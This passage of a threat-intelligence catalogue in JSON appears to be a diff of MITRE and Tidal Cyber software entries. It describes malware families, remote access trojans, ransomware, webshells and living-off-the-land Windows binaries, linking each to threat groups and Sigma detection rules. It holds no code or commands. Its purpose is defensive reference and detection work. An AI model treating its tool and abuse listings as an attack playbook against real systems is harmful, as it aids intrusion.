"dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "a545456a-f9a7-47ad-9ea6-8b017def38d1", + "type": "similar" + } + ], + "uuid": "320b0784-4f0f-46ea-99e9-c34bfcca1c2e", + "value": "Pandora" + }, + { + "description": "[Pasam](https://app.tidalcyber.com/software/3f018e73-d09b-4c8d-815b-8b2c8faf7055) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor on compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Pasam May 2012](https://app.tidalcyber.com/references/c8135017-43c5-4bde-946e-141684c29b7a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0208", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "e811ff6a-4cef-4856-a6ae-a7daf9ed39ae", + "type": "similar" + } + ], + "uuid": "3f018e73-d09b-4c8d-815b-8b2c8faf7055", + "value": "Pasam" + }, + { + "description": "[Pass-The-Hash Toolkit](https://app.tidalcyber.com/software/8d007d52-8898-494c-8d72-354abd93da1e) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [], + "software_attack_id": "S0122", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "a52edc76-328d-4596-85e7-d56ef5a9eb69", + "type": "similar" + } + ], + "uuid": "8d007d52-8898-494c-8d72-354abd93da1e", + "value": "Pass-The-Hash Toolkit" + }, + { + "description": "PasswordFox is a tool used to recover passwords from Firefox web browser.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5037", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "e12e1de8-a0d9-4602-8264-5952106bd53c", + "value": "PasswordFox" + }, + { + "description": "[[NCCIC AR-17-20045 February 2017](https://app.tidalcyber.com/references/b930e838-649b-42ab-86dc-0443667276de)]", + "meta": { + "id": "36b3f358-eef6-486a-a1a3-f5847161ea83" + }, + "related": [ + { + "dest-uuid": "4d79530c-2fd9-4438-a8da-74f42119695a", + "type": "similar" + } + ], + "uuid": "0d76d9ee-8696-42f9-9f34-52f3ad265995", + "value": "Fobushell" + }, + { + "description": "[P.A.S. Webshell](https://app.tidalcyber.com/software/4d79530c-2fd9-4438-a8da-74f42119695a) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.[[ANSSI Sandworm January 2021](https://app.tidalcyber.com/references/5e619fef-180a-46d4-8bf5-998860b5ad7e)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0598", + "source": "MITRE", + "tags": [ + "311abf64-a9cc-4c6a-b778-32c5df5658be" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "4800d0f9-00aa-47cd-a4d2-92198585b8fd", + "type": "similar" + }, + { + "dest-uuid": "0d76d9ee-8696-42f9-9f34-52f3ad265995", + "type": "similar" + } + ], + "uuid": "4d79530c-2fd9-4438-a8da-74f42119695a", + "value": "P.A.S. Webshell" + }, + { + "description": "[Pay2Key](https://app.tidalcyber.com/software/9aa21e50-726e-4002-8b7b-75697a03eb2b) is a ransomware written in C++ that has been used by [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://app.tidalcyber.com/software/9aa21e50-726e-4002-8b7b-75697a03eb2b) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)][[Check Point Pay2Key November 2020](https://app.tidalcyber.com/references/e4ea263d-f70e-4f9c-92a1-cb0e565a5ae9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0556", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "77ca1aa3-280c-4b67-abaa-e8fb891a8f83", + "type": "similar" + } + ], + "uuid": "9aa21e50-726e-4002-8b7b-75697a03eb2b", + "value": "Pay2Key" + }, + { + "description": "[[Pcalua.exe - LOLBAS Project](/references/958064d4-7f9f-46a9-b475-93d6587ed770)]", + "meta": { + "id": "82d71795-9826-4ab2-b6d7-37c902cc0b50", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "00daafc4-8bf1-4447-b24f-1580263124f5", + "type": "similar" + } + ], + "uuid": "4a3504d3-5ff3-4aa1-8894-74fabf92d922", + "value": "Pcalua.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Program Compatibility Assistant\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\pcalua.exe\n\n**Resources:**\n* [https://twitter.com/KyleHanslovan/status/912659279806640128](https://twitter.com/KyleHanslovan/status/912659279806640128)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pcalua.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml)[[Pcalua.exe - LOLBAS Project](/references/958064d4-7f9f-46a9-b475-93d6587ed770)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5137", + "source": "Tidal Cyber", + "tags": [ + "074533ec-e14a-4dc3-98ae-c029904e3d6d", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4a3504d3-5ff3-4aa1-8894-74fabf92d922", + "type": "similar" + } + ], + "uuid": "00daafc4-8bf1-4447-b24f-1580263124f5", + "value": "Pcalua" + }, + { + "description": "PCHunter is a tool used to enable advanced task management, including for system processes and kernels.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5038", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "591acc39-1218-4710-aadc-150ae6475ee3", + "value": "PCHunter" + }, + { + "description": "[PcShare](https://app.tidalcyber.com/software/71eb2211-39aa-4b89-bd51-9dcabd363149) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)][[GitHub PcShare 2014](https://app.tidalcyber.com/references/f113559f-a6da-43bc-bc64-9ff7155b82bc)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1050", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3a53b207-aba2-4a2b-9cdb-273d633669e7", + "type": "similar" + } + ], + "uuid": "71eb2211-39aa-4b89-bd51-9dcabd363149", + "value": "PcShare" + }, + { + "description": "[[Pcwrun.exe - LOLBAS Project](/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]", + "meta": { + "id": "abcc649b-45a1-4c46-b6a7-8e7954e244a8", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7babb537-ec29-425a-9108-43d1619e02b5", + "type": "similar" + } + ], + "uuid": "3bc797f7-59bc-4ce6-8cf9-e533e317aaa8", + "value": "Pcwrun.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Program Compatibility Wizard\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\pcwrun.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/991335019833708544](https://twitter.com/pabraeken/status/991335019833708544)\n* [https://twitter.com/nas_bench/status/1535663791362519040](https://twitter.com/nas_bench/status/1535663791362519040)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pcwrun_follina.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml)[[Pcwrun.exe - LOLBAS Project](/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5138", + "source": "Tidal Cyber", + "tags": [ + "62496b72-7820-4512-b3f9-188464bb8161", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3bc797f7-59bc-4ce6-8cf9-e533e317aaa8", + "type": "similar" + } + ], + "uuid": "7babb537-ec29-425a-9108-43d1619e02b5", + "value": "Pcwrun" + }, + { + "description": "[[Pcwutl.dll - LOLBAS Project](/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]", + "meta": { + "id": "c59ec19a-7478-4186-9ba6-81728661f265", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "47ba2c2c-b4f3-48dc-878f-b8cab6d97f65", + "type": "similar" + } + ], + "uuid": "f464e0cd-7a76-4924-9473-90f334f886ce", + "value": "Pcwutl.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft HTML Viewer\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\pcwutl.dll\n* c:\\windows\\syswow64\\pcwutl.dll\n\n**Resources:**\n* [https://twitter.com/harr0ey/status/989617817849876488](https://twitter.com/harr0ey/status/989617817849876488)\n* [https://windows10dll.nirsoft.net/pcwutl_dll.html](https://windows10dll.nirsoft.net/pcwutl_dll.html)\n\n**Detection:**\n* Analysis: [https://redcanary.com/threat-detection-report/techniques/rundll32/](https://redcanary.com/threat-detection-report/techniques/rundll32/)\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Pcwutl.dll - LOLBAS Project](/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5193", + "source": "Tidal Cyber", + "tags": [ + "ff5c357e-6b9b-4ef3-a7ed-e5d4c0091c0c", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "f464e0cd-7a76-4924-9473-90f334f886ce", + "type": "similar" + } + ], + "uuid": "47ba2c2c-b4f3-48dc-878f-b8cab6d97f65", + "value": "Pcwutl" + }, + { + "description": "[Peirates](https://app.tidalcyber.com/software/52a19c73-2454-4893-8f84-8d05c37a9472) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.[[Peirates GitHub](https://app.tidalcyber.com/references/a75cde8b-76e4-4dc3-b1d5-cf08479905e7)]", + "meta": { + "platforms": [ + "Containers" + ], + "software_attack_id": "S0683", + "source": "MITRE", + "tags": [ + "2e5f6e4a-4579-46f7-9997-6923180815dd", + "4fa6f8e1-b0d5-4169-8038-33e355c08bde", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", + "type": "used-by" + }, + { + "dest-uuid": "79dd477a-8226-4b3d-ad15-28623675f221", + "type": "similar" + } + ], + "uuid": "52a19c73-2454-4893-8f84-8d05c37a9472", + "value": "Peirates" + }, + { + "description": "[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", + "meta": { + "id": "5932da92-3695-4121-8b20-d4c7df200a67" + }, + "related": [ + { + "dest-uuid": "951fad62-f636-4c01-b924-bb0ce87f5b20", + "type": "similar" + } + ], + "uuid": "e7c7c852-6196-49e9-b883-ccfd5ae47aca", + "value": "Penquin 2.0" + }, + { + "description": "[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", + "meta": { + "id": "811dc1ed-6ce8-494c-80fa-16836aab6f42" + }, + "related": [ + { + "dest-uuid": "951fad62-f636-4c01-b924-bb0ce87f5b20", + "type": "similar" + } + ], + "uuid": "42c40368-672c-4118-bd35-9935208978e1", + "value": "Penquin_x64" + }, + { + "description": "[Penquin](https://app.tidalcyber.com/software/951fad62-f636-4c01-b924-bb0ce87f5b20) is a remote access trojan (RAT) with multiple versions used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target Linux systems since at least 2014.[[Kaspersky Turla Penquin December 2014](https://app.tidalcyber.com/references/957edb5c-b893-4968-9603-1a6b8577f3aa)][[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0587", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "d18cb958-f4ad-4fb3-bb4f-e8994d206550", + "type": "similar" + }, + { + "dest-uuid": "e7c7c852-6196-49e9-b883-ccfd5ae47aca", + "type": "similar" + }, + { + "dest-uuid": "42c40368-672c-4118-bd35-9935208978e1", + "type": "similar" + } + ], + "uuid": "951fad62-f636-4c01-b924-bb0ce87f5b20", + "value": "Penquin" + }, + { + "description": "[Peppy](https://app.tidalcyber.com/software/1f080577-c002-4b49-a342-fa70983c1d58) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://app.tidalcyber.com/software/3b3f296f-20a6-459a-98c5-62ebdee3701f).[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0643", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "441b91d1-256a-4763-bac6-8f1c76764a25", + "type": "used-by" + }, + { + "dest-uuid": "6c2550d5-a01a-4bbb-a004-6ead348ba623", + "type": "similar" + } + ], + "uuid": "1f080577-c002-4b49-a342-fa70983c1d58", + "value": "Peppy" + }, + { + "description": "[[Pester.bat - LOLBAS Project](/references/93f281f6-6fcc-474a-b222-b303ea417a18)]", + "meta": { + "id": "18fa1f56-f4b5-447e-ac86-26f17d9f2bd1", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5028ed72-8e6b-48bd-b4f4-e42df926893d", + "type": "similar" + } + ], + "uuid": "3c004ca1-7436-44e9-85e4-33d55fc74f5e", + "value": "Pester.bat" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used as part of the Powershell pester\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\bin\\Pester.bat\n* c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*\\bin\\Pester.bat\n\n**Resources:**\n* [https://twitter.com/Oddvarmoe/status/993383596244258816](https://twitter.com/Oddvarmoe/status/993383596244258816)\n* [https://twitter.com/_st0pp3r_/status/1560072680887525378](https://twitter.com/_st0pp3r_/status/1560072680887525378)\n* [https://twitter.com/_st0pp3r_/status/1560072680887525378](https://twitter.com/_st0pp3r_/status/1560072680887525378)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pester_1.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml)[[Pester.bat - LOLBAS Project](/references/93f281f6-6fcc-474a-b222-b303ea417a18)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5264", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3c004ca1-7436-44e9-85e4-33d55fc74f5e", + "type": "similar" + } + ], + "uuid": "5028ed72-8e6b-48bd-b4f4-e42df926893d", + "value": "Pester" + }, + { + "description": "[PHOREAL](https://app.tidalcyber.com/software/fd63cec1-9f72-4ed0-9926-2dbbb3d9cead) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). [[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0158", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e", + "type": "similar" + } + ], + "uuid": "fd63cec1-9f72-4ed0-9926-2dbbb3d9cead", + "value": "PHOREAL" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nPikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5265", + "source": "Tidal Cyber", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + } + ], + "uuid": "d2a226a2-ffa1-4bb0-a090-96dc42f9c84c", + "value": "Pikabot" + }, + { + "description": "[Pillowmint](https://app.tidalcyber.com/software/db5d718b-1344-4aa2-8e6a-54e68d8adfb1) is a point-of-sale malware used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) designed to capture credit card information.[[Trustwave Pillowmint June 2020](https://app.tidalcyber.com/references/31bf381d-a0fc-4a4f-8d39-832480891685)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0517", + "source": "MITRE", + "tags": [ + "6c6c0125-9631-4c2c-90ab-cfef374d5198" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "type": "similar" + } + ], + "uuid": "db5d718b-1344-4aa2-8e6a-54e68d8adfb1", + "value": "Pillowmint" + }, + { + "description": "[PinchDuke](https://app.tidalcyber.com/software/ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2008 to 2010. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0048", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ae9d818d-95d0-41da-b045-9cabea1ca164", + "type": "similar" + } + ], + "uuid": "ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4", + "value": "PinchDuke" + }, + { + "description": "[Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) is an operating system utility commonly used to troubleshoot and verify network connections. [[TechNet Ping](https://app.tidalcyber.com/references/5afc8ad5-f50d-464f-ba84-e347b3f3e994)]", + "meta": { + "platforms": [], + "software_attack_id": "S0097", + "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "type": "similar" + } + ], + "uuid": "4ea12106-c0a1-4546-bb64-a1675d9f5dc7", + "value": "Ping" + }, + { + "description": "PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5003", + "source": "Tidal Cyber", + "tags": [ + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "1debf242-3c91-4bdb-932c-27d61fe17474", + "value": "PingCastle" + }, + { + "description": "[PingPull](https://app.tidalcyber.com/software/4360cc62-7263-48b2-bd2a-a7737563545c) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) since at least June 2022. [PingPull](https://app.tidalcyber.com/software/4360cc62-7263-48b2-bd2a-a7737563545c) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.[[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1031", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "3a0f6128-0a01-421d-8eca-e57d8671b1f1", + "type": "similar" + } + ], + "uuid": "4360cc62-7263-48b2-bd2a-a7737563545c", + "value": "PingPull" + }, + { + "description": "[PipeMon](https://app.tidalcyber.com/software/92744f7b-9f1a-472c-bae0-2d4a7ce68bb4) is a multi-stage modular backdoor used by [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).[[ESET PipeMon May 2020](https://app.tidalcyber.com/references/cbc09411-be18-4241-be69-b718a741ed8c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0501", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6932662a-53a7-4e43-877f-6e940e2d744b", + "type": "used-by" + }, + { + "dest-uuid": "8393dac0-0583-456a-9372-fd81691bca20", + "type": "similar" + } + ], + "uuid": "92744f7b-9f1a-472c-bae0-2d4a7ce68bb4", + "value": "PipeMon" + }, + { + "description": "[Pisloader](https://app.tidalcyber.com/software/14e65c5d-5164-41a3-92de-67fdd1d529d2) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) and is similar to another malware family, [HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa), that has been used by the group. [[Palo Alto DNS Requests](https://app.tidalcyber.com/references/4a946c3f-ee0a-4649-8104-2bd9d90ebd49)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0124", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "used-by" + }, + { + "dest-uuid": "b96680d1-5eb3-4f07-b95c-00ab904ac236", + "type": "similar" + } + ], + "uuid": "14e65c5d-5164-41a3-92de-67fdd1d529d2", + "value": "Pisloader" + }, + { + "description": "[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]", + "meta": { + "id": "e1d6b68d-7d2e-409b-909a-31807a46bc5d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "0b0ae21a-987c-44c5-93db-3b228544eb99", + "type": 